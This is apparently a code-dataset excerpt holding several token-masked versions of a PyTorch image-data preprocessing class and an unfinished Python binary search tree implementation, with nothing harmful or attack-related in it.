split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n <function token>\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n <function token>\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n <function token>\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n <function token>\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n <function token>\n <function token>\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n <function token>\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n <function token>\n <function token>\n <function token>\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n <function token>\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<class token>\n" ]
false
81
64c32b3ada7fff51a7c4b07872b7688e100897d8
class Node(object): def __init__(self,data): self.data = data self.left = None self.right = None self.parent = None class tree(object): def __init__(self): self.root = None def insert(self,root,value): if self.root == None: self.root = Node(value) else: if value < root.data: if root.left is None: root.left = Node(value) else: self.insert(root.left,value) elif value > root.data: if root.right is None: root.right = Node(value) else: self.insert(root.right,value) return root def delete(self,root,data,parent): if root is None: return root if root.data < data: parent = root root.right = self.delete(root.right,data,parent) elif root.data > data : parent = root root.left = self.delete(root.left,data,parent) else: if root is None or root.data != data: return False elif root.left is None and root.right is None: if data > parent.data: parent.right = None root = None else: parent.left = None root = None elif root.left is None: if data > parent.data: parent.right = root.right root = parent.right else: parent.left = root.right root = parent.left elif root.right is None: if data > parent.data: parent.right = root.right root = parent.right else: parent.left = root.right root = parent.right else: temp = self.successor(root.right) root.data = temp.data root.right = self.delete(root.right,temp.data,parent) return root def successor(self,root): temp = root if root.right: while temp.left: temp = temp.left return temp def inorder(self,root): if root is not None: self.inorder(root.left) print(root.data) self.inorder(root.right) def main(): Tree = tree() l =[50,30,20,40,70,60,80] for item in l: Tree.insert(Tree.root,item) print(Tree.delete(Tree.root,20,None)) print("inorder after deleting 20:") print(Tree.inorder(Tree.root)) print(Tree.delete(Tree.root,30,None)) print(Tree.delete(Tree.root,50,None)) print(Tree.inorder(Tree.root)) main()
[ "class Node(object):\n def __init__(self,data):\n self.data = data\n self.left = None\n self.right = None\n self.parent = None\n\nclass tree(object):\n def __init__(self):\n self.root = None\n \n def insert(self,root,value):\n if self.root == None:\n self.root = Node(value)\n else:\n if value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left,value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right,value)\n return root \n def delete(self,root,data,parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right,data,parent)\n elif root.data > data :\n parent = root\n root.left = self.delete(root.left,data,parent)\n else:\n if root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n \n elif root.right is 